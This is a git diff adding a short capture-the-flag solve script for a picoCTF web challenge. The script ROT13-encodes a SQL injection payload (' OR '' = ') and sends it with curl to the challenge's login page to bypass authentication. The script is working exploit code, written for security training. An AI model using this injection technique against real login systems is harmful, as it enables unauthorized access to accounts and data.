diff --git a/web/irish_name_repo_3/solve.sh b/web/irish_name_repo_3/solve.sh new file mode 100755 index 0000000..588ad5e --- /dev/null +++ b/web/irish_name_repo_3/solve.sh @@ -0,0 +1,8 @@ +#!/usr/bin/env bash + +PAYLOAD_RAW="' OR '' = '" +PAYLOAD="$(tr 'A-Za-z' 'N-ZA-Mn-za-m' <<<"$PAYLOAD_RAW")" + +curl 'http://fickle-tempest.picoctf.net:49659/login.php' \ + -X POST \ + --data-raw "debug=1&password=$PAYLOAD"